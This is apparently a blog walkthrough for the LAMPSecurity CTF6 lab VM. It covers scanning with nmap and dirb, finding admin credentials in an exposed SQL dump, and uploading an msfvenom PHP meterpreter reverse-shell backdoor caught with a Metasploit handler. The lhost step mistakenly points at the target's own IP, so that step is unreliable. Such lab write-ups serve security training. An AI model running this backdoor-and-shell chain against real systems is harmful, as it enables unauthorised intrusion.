Introduction
In this post, You will learn how to CTF the Lampsecurity CTF6, and I am sure by the end of this post, You will be able to capture the flag
To download Lampsecurity CTF 6 [Click here]
LAMPSecurity: CTF6 Walkthrough
Just follow the below steps, and I am sure by the end of the post we will be accessing the meterpreter shell.
Step1, Finding the target IP
To find the target IP address, just enter arp-scan -l, or you can use the net discover commend to find the target IP address.
I am going with arp-scan -l
![LAMPSecurity: CTF6](http://techyrick.com/wp-content/uploads/2021/12/2021-12-14-14_48_14-Kali-Linux-2021.3-64bit-VMware-Workstation-16-Player-Non-commercial-use-onl-1024x310.webp)
Step2, Nmap scan
We are doing nmap scan to find the service and the open ports. And I will save this information for further enumeration if needed.
nmap -A -sT -p- 192.168.1.3
nmap -A -sT -p- <IP>
![LAMPSecurity: CTF6](http://techyrick.com/wp-content/uploads/2021/12/2021-12-14-15_06_22-Kali-Linux-2021.3-64bit-VMware-Workstation-16-Player-Non-commercial-use-onl.webp)
Step3, Enumerating using dirb
dirb http://192.168.1.3 /home/osboxes/ctf6.txt
I am using my own set of keywords, you can go with rockyou.txt like this
dirb <Target> rockyou.txt
![LAMPSecurity: CTF6s](http://techyrick.com/wp-content/uploads/2021/12/2021-12-14-15_12_58-Kali-Linux-2021.3-64bit-VMware-Workstation-16-Player-Non-commercial-use-onl.webp)
We can see that /SQL and /files are LISTENABLE, so, let’s do manual enumeration.
So, I will just go sql directory and move to this URL
http://192.168.1.3/sql/db.sql
![LAMPSecuritys: CTF6](http://techyrick.com/wp-content/uploads/2021/12/2021-12-14-15_29_53-192.168.1.3_sql_db.sql-Opera.png)
Login as admin the admin username will be admin and password will be adminpass
![](http://techyrick.com/wp-content/uploads/2021/12/2021-12-14-15_34_56-Kali-Linux-2021.3-64bit-VMware-Workstation-16-Player-Non-commercial-use-onl.png)
Step4, Generating a backdoor
To generate back door, just enter this command and save it in a TXT file
msfvenom -p php/meterpreter/reverse_tcp -o /home/osboxes/shell.php lport=4444 lhost=192.168.1.3
Let’s upload the payload file on our admin panel and exploit it
Click on add event and enter as see from the below image and also upload you payload in it
![](http://techyrick.com/wp-content/uploads/2021/12/2021-12-14-16_01_57-LAMPSecurity_-CTF6-Vulnhub-Walkthrough-Opera.png)
![](http://techyrick.com/wp-content/uploads/2021/12/2021-12-14-16_02_52-Index-of-_files-Opera.png)
Step5, Exploiting the payload
msfconsole
msf5 > use exploit/multi/handler
Now, set the payload
msf5 exploit(multi/handler) > set payload php/meterpreter/reverse_tcp
Set the lhost to your target IP Address
msf5 exploit(multi/handler) > set lhost 192.168.1.3
Set the lport and then enter exploit or run
msf5 exploit(multi/handler) > set lport 4444
msf5 exploit(multi/handler) > exploit
![](http://techyrick.com/wp-content/uploads/2021/12/2021-12-14-16_23_27-Kali-Linux-2021.3-64bit-VMware-Workstation-16-Player-Non-commercial-use-onl.png)
After some time you will be getting access to meterpreter shell and from there you can do post, enumeration.
Also Read: LAMPSECURITY: CTF8 Full tutorial